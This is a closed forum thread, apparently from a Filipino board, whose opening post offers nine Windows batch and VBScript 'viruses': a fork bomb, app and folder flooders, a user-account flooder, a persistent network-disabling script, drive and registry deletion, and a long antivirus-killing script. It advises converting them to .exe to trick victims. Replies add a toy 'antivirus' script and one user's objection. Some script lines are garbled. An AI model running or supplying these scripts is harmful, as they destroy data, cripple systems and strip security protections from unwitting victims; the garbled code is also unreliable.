What's new

Closed How to create dangerous virus with notepad

Status
Not open for further replies.

johndy13

Addict
Joined
Apr 17, 2017
Posts
16
Reaction
3
Points
68
1. Application Bomber:-

echo off
??
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Function- Once executed, it will start to open different applications repeatedly which will affect system’s performance. You can also add application of your choice in above code.

2. Folder Flooder-

echo off
??
md %random%
/folder.
goto x

Function- Once executed, it will start to generate folders whose name can be any random number.

3. User Account Flooder:-

echo off
:xnet
user %random% /add
goto x

Function- Once executed it will start creating Windows User Accounts whose name can be any random number.

4. Process Creator:-
%0|%0

Function:- Once executed, it will start to generate a large number of processes very quickly resulting in hanging of P.C.

5. Internet Disabler:-

echo echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been häçkED!
PAUSE

Function- Once executed, it will disable the internet connection of a computer permanently.

6. O.S. häçker:-

echo off
Del C: *.* |y

Function:- Once executed it will format C disk drive and hence resulting in deleting the O.S. You can also replace C with any drive of your choice.

7. Registry Deleter:-

echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been häçked by cool häçker. Have a nice day. Enjoy!!!
GOTO MESSAGE

Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim’s computer.

8. Crazy Caps Lock:-

Set wshShell
=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Function:- Once executed it will turn Caps Lock continuously on and off annoying the user.

9. Anti Virus Disabler:-

@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:program Filesalwils~1avast4*.*
del /Q /F C:program FilesLavasoftAd-awa~1*.exe
del /Q /F C:program Fileskasper~1*.exe
cls
del /Q /F C:program Filestrojan~1*.exe
del /Q /F C:program Filesf-prot95*.dll
del /Q /F C:program Filestbav*.datcls
del /Q /F C:program Filesavpersonal*.vdf
del /Q /F C:program FilesNorton~1*.cnt
del /Q /F C:program FilesMcafee*.*
cls
del /Q /F C:program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:program FilesNorton~1Norton~1*.*
del /Q /F C:program FilesNorton~1*.*
cls
del /Q /F C:program Filesavgamsr*.exe
del /Q /F C:program Filesavgamsvr*.exe
del /Q /F C:program Filesavgemc*.exe
cls
del /Q /F C:program Filesavgcc*.exe
del /Q /F C:program Filesavgupsvc*.exe
del /Q /F C:program Filesgrisoft
del /Q /F C:program Filesnood32krn*.exe
del /Q /F C:program Filesnood32*.exe
cls
del /Q /F C:program Filesnod32
del /Q /F C:program Filesnood32
del /Q /F C:program Fileskav*.exe
del /Q /F C:program Fileskavmm*.exe
del /Q /F C:program Fileskaspersky*.*
cls
del /Q /F C:program Filesewidoctrl*.exe
del /Q /F C:program Filesguard*.exe
del /Q /F C:program Filesewido*.exe
cls
del /Q /F C:program Filespavprsrv*.exe
del /Q /F C:program Filespavprot*.exe
del /Q /F C:program Filesavengine*.exe
cls
del /Q /F C:program Filesapvxdwin*.exe
del /Q /F C:program Fileswebproxy*.exe
del /Q /F C:program Filespanda
software*.*
rem

Function:- Once executed it will disable the Anti Virus of the victim’s system.

Drawback of a batch file viruse is that any one can open it with notepad and read the command easily. Also, any one can delete it if they find it harmful. So, to overcome the limitation/drawback, you can use a cool tool named ‘Batch to Exe Converter’. It will convert the ‘.bat’ extension into ‘.exe’ extension. And your Batch file will be converted into an Application file. You can easily convince your victim to open the file.
A Personal Message To You
It is nice to see that you have gone through “Post Facebook Status in Future” completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting häçking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

HAHAH, NapakaSARAP
 
Perwisyo batalaga,
ayaw mo nun,,.

Sige bigyan kitang anti virus naman, para hindi ma perwisyo sayo

echo off
title Antivirus
echo Antivirus
echo created by (pangalan mo okaya pangalan ng kapit bahay mo okaya ung tuta mo)
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean
cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit

save mo .bat
 
Last edited:
Perwisyo batalaga,
ayaw mo nun,,.

Sige bigyan kitang anti virus naman, para hindi ma perwisyo sayo

echo off
title Antivirus
echo Antivirus
echo created by (pangalan mo okaya pangalan ng kapit bahay mo okaya ung tuta mo)
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean
cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit

save mo .bat
naks.. malalaman ko rin kung sino ka.
 
yung iba jan sa post mo na try ko na at ang iba hindi pa nung nag try ako sa mga computer shop, may deepfreeze kasi kaya hindi ma save kaya tuloy ang tuklas :) bitaw salamat sa mga notepad virus mo :)
 
Last edited by a moderator:
tama.. napakalaki ng perwisyo nito kapag napasa2x na.. i just don't get what's the point of all these tutorial? nonsense and napaka useless..

mas mabuti pa tutorials on how to protect your pc from viruses ang ginawa mo ts.. mapapakinabangan pa yan ng mga taga rito.
 
Status
Not open for further replies.

Similar threads

Back
Top